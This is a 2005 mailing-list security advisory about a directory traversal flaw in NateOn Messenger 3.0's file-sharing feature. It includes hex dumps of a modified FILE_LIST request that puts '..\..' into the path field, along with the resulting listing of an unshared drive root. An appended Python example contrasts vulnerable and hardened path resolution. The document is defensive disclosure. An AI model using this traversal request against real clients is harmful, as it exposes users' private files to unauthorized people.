Message-ID: <20050712024710.A50EC960@lists.grok.org.uk>
Date: Tue Jul 12 10:43:40 2005
From: saintlinu at yahoo.co.kr (saintlinu)
Subject: NateOn Messenger Version 3.0 Directory listing vulnerability

Dear F/D Mailing lists

 

Title:               NateOn Messenger Version 3.0 Directory listing vulnerability

Discoverer:        PARK, GYU TAE (saintlinu@...l2root.org)

Advisory No.:      NRVA05-02

Criticality:         Less critical

Impact:              Information disclosure to an unauthorized user, and DoS

Where:               From remote

Operating System:    Windows only

Solution:            Patched

Workaround:          Disable the file share function until the vendor patch is applied

 

Notice:              06. 20. 2005 Initial notification - no response

                     06. 23. 2005 Second notification - no response

                     06. 27. 2005 Vulnerability disclosed

                     06. 29. 2005 Secunia notified; vendor responded

                     07. 0X. 2005 Patched (I don't know the exact patch date
                     because the vendor did not inform me)

 

Description:

NateOn, an Internet messenger similar to MSN, is popular in Korea among
users in their twenties and thirties.

There is a vulnerability in its FileShare feature.

When a user shares a folder such as 'openFolder', registered friends can
access that folder.

However, a friend can also access an unshared folder such as '%windir%',
because NateOn trusts the path in the (modified) client request instead of
checking it against the list of folders the user actually shared.

 

See the following details:

Target friend id is 'buddyid=??????@...e.com'

Shared folder name is 'debug'

 

[recv] Message - ### Socket : 1088 / Content-Length : 9190
Content :
00 20 31 20 31 39 38 0D 0A 3C 66 6F 6C 64 65 72 . 1 198..<folder
6C 69 73 74 20 6E 61 6D 65 3D 27 B3 CA B8 B8 BF list name='.....
CD 27 20 62 75 64 64 79 69 64 3D 27 XX XX XX XX .' buddyid='XXXX
XX XX 40 6E 61 74 65 2E 63 6F 6D 27 20 74 79 70 XX@...e.com' typ
65 3D 27 30 27 3E 3C 66 6F 6C 64 65 72 69 6E 66 e='0'><folderinf
6F 20 6E 61 6D 65 3D 27 2B 5F 2B 27 20 61 75 74 o name='+_+' aut
68 6F 72 69 74 79 3D 27 32 27 20 66 6F 6C 64 65 hority='2' folde
72 69 64 3D 27 30 27 20 66 6F 6C 64 65 72 70 61 rid='0' folderpa
74 68 3D 27 43 3A 5C 64 65 62 75 67 27 20 63 6F th='C:\debug' co
6D 6D 65 6E 74 3D 27 2B 5F 2B 27 20 61 64 64 64 mment='+_+' addd
61 74 65 3D 27 32 30 30 35 30 35 32 36 31 37 35 ate='20050526175
32 33 37 27 3E 3C 2F 66 6F 6C 64 65 72 69 6E 66 237'></folderinf
6F 3E 3C 2F 66 6F 6C 64 65 72 6C 69 73 74 3E 00 o></folderlist>.
00 00 00 00 00 00                               ......

 

----------------------------------------------------------------

 

We received the target user's shared folder information (folderpath='C:\debug').

The outgoing packet can, however, be modified in the client process (the
author did this via the Win32 API CreateRemoteThread), simply substituting
'debug' with '..\..':

 

[send] Message - ### Socket : 1088 / Content-Length : 25
Content :
46 4C 52 4D 20 32 20 46 49 4C 45 5F 4C 49 53 54 FLRM 2 FILE_LIST
20 31 20 31 20 32 38 0D 0A                       1 1 28..

[send] Message - ### Socket : 1088 / Content-Length : 28
Content :
30 20 XX XX XX XX XX XX XX XX 40 6E 61 74 65 2E 0 YYYYYYYY@...e.
63 6F 6D 20 43 3A 5C 2E 2E 5C 2E 2E             com C:\..\..

 

----------------------------------------------------------------

The peer answers with the listing below.

 

[recv] Message - ### Socket : 1088 / Content-Length : 9216
Content :
00 4C 52 4D 20 31 20 46 49 4C 45 5F 4C 49 53 54 .LRM 1 FILE_LIST
20 31 20 31 20 39 38 31 0D 0A 3C 66 69 6C 65 6C  1 1 981..<filel
69 73 74 20 69 64 3D 27 XX XX XX XX XX XX 40 6E ist id='XXXXXX@n
61 74 65 2E 63 6F 6D 27 20 61 75 74 68 3D 27 32 ate.com' auth='2
27 20 70 61 74 68 3D 27 43 3A 5C 2E 2E 5C 2E 2E ' path='C:\..\..
27 20 66 6F 6C 64 65 72 69 64 3D 27 30 27 3E 3C ' folderid='0'><
66 69 6C 65 20 6E 61 6D 65 3D 27 41 55 54 4F 45 file name='AUTOE
58 45 43 2E 42 41 54 27 20 73 69 7A 65 3D 27 30 XEC.BAT' size='0
27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 2D ' date='2004-09-
31 35 20 31 36 3A 34 32 3A 30 37 27 20 69 73 66 15 16:42:07' isf
6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 older='n'/><file
20 6E 61 6D 65 3D 27 43 4F 4E 46 49 47 2E 53 59  name='CONFIG.SY
53 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65 S' size='0' date
3D 27 32 30 30 34 2D 30 39 2D 31 35 20 31 36 3A ='2004-09-15 16:
34 32 3A 30 37 27 20 69 73 66 6F 6C 64 65 72 3D 42:07' isfolder=
27 6E 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 'n'/><file name=
27 64 65 73 6B 74 6F 70 5F 61 75 64 69 74 2E 74 'desktop_audit.t
78 74 27 20 73 69 7A 65 3D 27 32 30 38 34 27 20 xt' size='2084' 
64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 34 date='2005-05-24
20 30 30 3A 32 32 3A 32 38 27 20 69 73 66 6F 6C  00:22:28' isfol
64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20 6E der='n'/><file n
61 6D 65 3D 27 64 6E 2E 76 62 73 27 20 73 69 7A ame='dn.vbs' siz
65 3D 27 33 32 34 27 20 64 61 74 65 3D 27 32 30 e='324' date='20
30 34 2D 31 30 2D 32 30 20 31 38 3A 33 31 3A 33 04-10-20 18:31:3
38 27 20 69 73 66 6F 6C 64 65 72 3D 27 6E 27 2F 8' isfolder='n'/
3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 65 64 69 ><file name='edi
2E 65 78 65 27 20 73 69 7A 65 3D 27 33 32 37 36 .exe' size='3276
38 27 20 64 61 74 65 3D 27 32 30 30 34 2D 31 30 8' date='2004-10
2D 32 30 20 31 38 3A 30 37 3A 30 35 27 20 69 73 -20 18:07:05' is
66 6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C folder='n'/><fil
65 20 6E 61 6D 65 3D 27 6D 73 30 34 2D 30 33 32 e name='ms04-032
2E 77 6D 66 27 20 73 69 7A 65 3D 27 35 37 36 27 .wmf' size='576'
20 64 61 74 65 3D 27 32 30 30 34 2D 31 30 2D 32  date='2004-10-2
30 20 31 38 3A 33 33 3A 34 31 27 20 69 73 66 6F 0 18:33:41' isfo
6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20 lder='n'/><file 
6E 61 6D 65 3D 27 63 6F 6E 63 65 72 74 27 20 73 name='concert' s
69 7A 65 3D 27 30 27 20 64 61 74 65 3D 27 32 30 ize='0' date='20
30 34 2D 31 30 2D 32 30 20 31 35 3A 31 32 3A 35 04-10-20 15:12:5
37 27 20 69 73 66 6F 6C 64 65 72 3D 27 79 27 2F 7' isfolder='y'/
3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 64 65 62 ><file name='deb
75 67 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 ug' size='0' dat
65 3D 27 32 30 30 35 2D 30 35 2D 32 33 20 31 32 e='2005-05-23 12
3A 34 38 3A 33 37 27 20 69 73 66 6F 6C 64 65 72 :48:37' isfolder
3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65 ='y'/><file name
3D 27 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 ='Documents and 
53 65 74 74 69 6E 67 73 27 20 73 69 7A 65 3D 27 Settings' size='
30 27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 0' date='2004-09
2D 31 35 20 31 37 3A 30 39 3A 31 34 27 20 69 73 -15 17:09:14' is
66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C folder='y'/><fil
65 20 6E 61 6D 65 3D 27 50 72 6F 67 72 61 6D 20 e name='Program 
46 69 6C 65 73 27 20 73 69 7A 65 3D 27 30 27 20 Files' size='0' 
64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 36 date='2005-05-26
20 30 38 3A 30 36 3A 31 31 27 20 69 73 66 6F 6C  08:06:11' isfol
64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E der='y'/><file n
61 6D 65 3D 27 74 65 73 74 27 20 73 69 7A 65 3D ame='test' size=
27 30 27 20 64 61 74 65 3D 27 32 30 30 35 2D 30 '0' date='2005-0
34 2D 32 30 20 31 34 3A 31 35 3A 34 39 27 20 69 4-20 14:15:49' i
73 66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69 sfolder='y'/><fi
6C 65 20 6E 61 6D 65 3D 27 57 49 4E 44 4F 57 53 le name='WINDOWS
27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65 3D ' size='0' date=
27 32 30 30 34 2D 31 30 2D 32 30 20 31 36 3A 30 '2004-10-20 16:0
30 3A 31 37 27 20 69 73 66 6F 6C 64 65 72 3D 27 0:17' isfolder='
79 27 2F 3E 3C 2F 66 69 6C 65 6C 69 73 74 3E 00 y'/></filelist>.
00 00 00 00 00 00                               ......

 

Buddy id = YYYYYY@...e.com

Requested directory = 'C:\..\..' (resolves to the root of C:, which was never shared)

File list returned for the unshared directory:

 

<filelist id='YYYYYY@...e.com' auth='2' path='C:\..\..' folderid='0'>
<file name='AUTOEXEC.BAT'           size='0'     date='2004-09-15 16:42:07' isfolder='n'/>
<file name='CONFIG.SYS'             size='0'     date='2004-09-15 16:42:07' isfolder='n'/>
<file name='desktop_audit.txt'      size='2084'  date='2005-05-24 00:22:28' isfolder='n'/>
<file name='dn.vbs'                 size='324'   date='2004-10-20 18:31:38' isfolder='n'/>
<file name='edi.exe'                size='32768' date='2004-10-20 18:07:05' isfolder='n'/>
<file name='ms04-032.wmf'           size='576'   date='2004-10-20 18:33:41' isfolder='n'/>
<file name='concert'                size='0'     date='2004-10-20 15:12:57' isfolder='y'/>
<file name='debug'                  size='0'     date='2005-05-23 12:48:37' isfolder='y'/>
<file name='Documents and Settings' size='0'     date='2004-09-15 17:09:14' isfolder='y'/>
<file name='Program Files'          size='0'     date='2005-05-26 08:06:11' isfolder='y'/>
<file name='test'                   size='0'     date='2005-04-20 14:15:49' isfolder='y'/>
<file name='WINDOWS'                size='0'     date='2004-10-20 16:00:17' isfolder='y'/>
</filelist>.
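The root cause is that the peer lists whatever path the FILE_LIST body names. The added example below (not code from the advisory or from NateOn) models the second FILE_LIST payload shown above, '0 <buddyid> <path>', and contrasts the trusting behaviour with a hardened resolver that looks the folder up by folderid in a server-side share table and only lists paths that stay inside it after canonicalisation. The share table and the buddy id are constructed for the example.

```python
import ntpath

# Constructed share table modelled on the folderlist the client received:
# folderid -> folderpath the local user explicitly shared.
SHARED_FOLDERS = {"0": "C:\\debug"}


def parse_file_list_body(body: str):
    """Split the FILE_LIST body '<folderid> <buddyid> <path>' into its fields."""
    parts = body.split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed FILE_LIST body")
    folderid, buddyid, path = parts
    return folderid, buddyid, path


def canonical(path: str) -> str:
    """Collapse '.' and '..' segments and normalise case and separators (Windows rules).
    ntpath is used so the example runs on any host."""
    return ntpath.normcase(ntpath.normpath(path))


def resolve_vulnerable(body: str) -> str:
    """Behaviour the advisory describes: the client-supplied path is used as-is,
    so '0 buddy C:\\..\\..' resolves to the drive root and gets listed."""
    _, _, path = parse_file_list_body(body)
    return canonical(path)


def resolve_hardened(body: str):
    """Resolve the listing root from the share table keyed by folderid, then require
    the requested path to stay inside that folder. Returns the canonical path to list,
    or None when the request must be refused."""
    folderid, _, path = parse_file_list_body(body)
    base = SHARED_FOLDERS.get(folderid)
    if base is None:
        return None                      # unknown folderid: nothing shared under it
    base_c = canonical(base)
    req_c = canonical(path)
    # Prefix test on a separator boundary so 'C:\debugger' does not pass for 'C:\debug'.
    if req_c == base_c or req_c.startswith(base_c.rstrip("\\") + "\\"):
        return req_c
    return None


if __name__ == "__main__":
    traversal = "0 buddy@example.invalid C:\\..\\.."   # constructed request
    print(resolve_vulnerable(traversal))   # c:\  (drive root would be listed)
    print(resolve_hardened(traversal))     # None (refused)
```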

 

---------------------[cut cut]----------------------------------------------

 

Thanks to my Null@...t members

 

PS. I'm very sorry for my poor English

 

Cheers
